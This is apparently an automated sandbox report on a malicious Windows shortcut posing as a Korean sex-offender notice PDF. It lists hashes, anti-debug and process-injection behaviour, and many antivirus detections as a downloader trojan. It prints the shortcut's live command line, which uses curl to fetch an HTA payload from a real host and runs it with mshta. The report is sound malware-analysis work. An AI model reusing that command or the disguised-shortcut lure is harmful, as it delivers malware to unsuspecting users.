Summary | ZeroBOX

성범죄자 신상정보 고지.pdf.lnk

Generic Malware AntiVM Lnk Format AntiDebug GIF Format
Category Machine Started Completed
FILE s1_win7_x6401 April 23, 2025, 1:26 p.m. April 23, 2025, 1:31 p.m.
Size 1.5KB
Type MS Windows shortcut, Item id list present, Points to a file or directory, Has command line arguments, Icon number=11, Archive, ctime=Sat Jul 27 14:38:47 2024, mtime=Sat Jul 27 14:38:47 2024, atime=Sat Jul 27 14:38:47 2024, length=323584, window=hidenormalshowminimized
MD5 1d64508b384e928046887dd9cb32c2ac
SHA256 a66c25b1f0dea6e06a4c9f8c5f6ebba0f6c21bd3b9cc326a56702db30418f189
CRC32 FC7EFACA
ssdeep 24:8TJJJ9VhXyM+AcESKbKxeYqVAMvMmXE+habhOOUzltY+/vmF:8F1QESKblBaMvMmXEiajmYks
Yara
  • Lnk_Format_Zero - LNK Format
  • lnk_file_format - Microsoft Windows Shortcut File Format
  • Generic_Malware_Zero - Generic Malware

Name Response Post-Analysis Lookup
cdn.glitch.global 151.101.66.132

IP Address Status Action
146.75.50.132 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

Flow Issuer Subject Fingerprint
TLS 1.3 192.168.56.101:49167 -> 146.75.50.132:443 None None None

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

status: 1 return: 1 repeated: 0
Time & API Arguments Status Return Repeated

bind

ip_address: 127.0.0.1
socket: 144
port: 0
status: 1 return: 0 repeated: 0

listen

socket: 144
backlog: 1
status: 1 return: 0 repeated: 0

accept

ip_address:
socket: 144
port: 0
status: 1 return: 152 repeated: 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73352000
process_handle: 0xffffffff
status: 1 return: 0 repeated: 0
file C:\Users\test22\AppData\Local\Temp\성범죄자 신상정보 고지.pdf.lnk
cmdline "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local\Temp && curl -O https://cdn.glitch.global/2eefa6a0-44ff-4979-9a9c-689be652996d/sfmw.hta?v=2 && mshta C:\Users\test22\AppData\Local\Temp\sfmw.hta
cmdline mshta C:\Users\test22\AppData\Local\Temp\sfmw.hta
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef90000
process_handle: 0xffffffff
status: 1 return: 0 repeated: 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Process injection Process 2540 resumed a thread in remote process 2656
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000334
suspend_count: 1
process_identifier: 2656
status: 1 return: 0 repeated: 0
Lionic Trojan.WinLNK.Nioc.4!c
CTX lnk.trojan.nioc
CAT-QuickHeal Html.Trojan.A14067327
Skyhigh BehavesLike.Trojan.zr
ALYac Trojan.Agent.LNK.Gen
VIPRE Heur.BZC.YAX.Nioc.1.1CDCF038
Arcabit Heur.BZC.YAX.Nioc.1.1CDCF038
Symantec Trojan Horse
ESET-NOD32 LNK/Downloader.A suspicious
TrendMicro-HouseCall TROJ_FRS.VSNTCP25
Avast Other:Malware-gen [Trj]
Kaspersky HEUR:Trojan.WinLNK.Agent.gen
BitDefender Heur.BZC.YAX.Nioc.1.1CDCF038
MicroWorld-eScan Heur.BZC.YAX.Nioc.1.1CDCF038
Rising Downloader.Mshta/LNK!1.BADA (CLASSIC)
Emsisoft Heur.BZC.YAX.Nioc.1.1CDCF038 (B)
TrendMicro TROJ_FRS.VSNTCP25
SentinelOne Static AI - Suspicious LNK
Google Detected
ViRobot LNK.S.Agent.1535
GData Heur.BZC.YAX.Nioc.1.1CDCF038
Varist LNK/ABTrojan.EJWN-
AhnLab-V3 Downloader/LNK.Generic.SC261280
McAfee LNK/Agent.a
VBA32 suspected of Trojan.Link.URL
Zoner Probably Heur.LNKScript
Tencent Win32.Trojan.Agent.Iflw
huorong TrojanDownloader/LNK.Agent.da
Fortinet LNK/Agent.ACX!tr
AVG Other:Malware-gen [Trj]
alibabacloud Trojan[downloader]:Win/BZC.YMF